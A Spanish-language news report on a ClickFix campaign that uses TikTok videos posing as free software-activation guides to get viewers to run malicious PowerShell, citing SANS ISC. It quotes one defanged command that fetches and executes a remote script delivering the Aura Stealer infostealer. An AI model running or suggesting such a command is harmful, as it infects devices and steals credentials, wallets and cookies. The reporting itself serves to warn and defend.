Ciberdelincuentes utilizan vídeos de TikTok para difundir ataques ClickFix y robar información de los usuarios

Una campaña de ciberdelincuentes utiliza la plataforma TikTok para compartir vídeos que pretenden ser guías para acceder de forma gratuita a 'software' de pago, como Windows o plataformas como Netflix, pero que en realidad son ataques ClickFix, que distribuyen 'malware' y permiten robar la información de los usuarios.

Los actores maliciosos ven la plataforma de vídeos cortos de ByteDance como canal de comunicación para técnicas de ingeniería social, al tratarse de un espacio al que usuarios de todas las edades acuden de forma recurrente para acceder a todo tipo de contenido, ya sea para entretenimiento, como para buscar información concreta sobre ciertos temas.

Entre estos contenidos, se comparten vídeos que se postulan como guías para lograr disponer gratis de ciertos servicios que habitualmente son de pago, así como para activar algunas funciones especiales de 'software', por ejemplo, en programas de Windows o Microsoft 365, así como en Photoshop de Adobe, o plataformas bajo suscripción como Netflix o Spotify.

En este sentido, el responsable del SANS Internet Storm Center (ISC), Xavier Mertens, a cargo del programa de monitoreo y alerta de ciberamenazas a nivel global, ha advertido sobre una campaña identificada en TikTok en la que los ciberdelincuentes utilizan este tipo de vídeos como engaño para realizar ataques ClickFix.

En concreto, los ataques ClickFix son una técnica de ingeniería social que se basa en mostrar la solución a supuestos problemas técnicos a través de, por ejemplo, una ventana emergente. Habitualmente los usuarios deben seguir varios pasos para completar estas soluciones, que en realidad sirven para manipular a las víctimas y convencerlas de que deben ejecutar un 'script' malicioso.

Así, en el caso de la campaña identificada en TikTok, los ciberdelicuentes utilizan los vídeos mencionados para, bajo la premisa de desbloquear un 'software' gratuito, engañar a los usuarios y conseguir que ejecuten comandos maliciosos PowerShell o, incluso, otros 'scripts' que acaban infectando el dispositivo desde el que se ejecuta con 'malware'.

Según ha detallado Mertens en un comunicado en la web de ISC y ha podido comprobar Bleeping Computer, cada vídeo incluye un comando corto de una línea (por ejemplo, 'iex (irm slmgr[.]win/photoshop', en el caso de un vídeo destinado a Photoshop) que los usuarios supuestamente tienen que ejecutar como administrador en PowerShell para disponer de los resultados que se garantizan en el vídeo.

Sin embargo, realmente se trata de un fragmento de código malicioso que infecta el dispositivo y que conecta con el sitio remoto 'slmgr[.]win' para recuperar y ejecutar otro 'script' de PowerShell. A su vez, este 'script' descarga dos ejecutables, uno de ellos, una variante del 'malware' de robo de información Aura Stealer.

De esta forma, los actores maliciosos se sirven de Aura Stealer para recopilar información como las credenciales de acceso con contraseña guardadas en los navegadores, las 'cookies' de autenticación o, incluso, las billeteras de criptomonedas de los usuarios.

Igualmente, el experto en ciberseguridad del ISE, ha remarcado que el segundo ejecutable se dedica a compilar código bajo demanda durante, aunque se desconoce el propósito final de esta carga útil.

Como resultado, desde Bleeping Computer han recordado que los usuarios que lleven a cabo todos los pasos que se explican en este tipo de vídeos en TikTok verán comprometidas todas sus credenciales, por lo que deberán restablecer las contraseñas de todos los sitios que visiten por seguridad.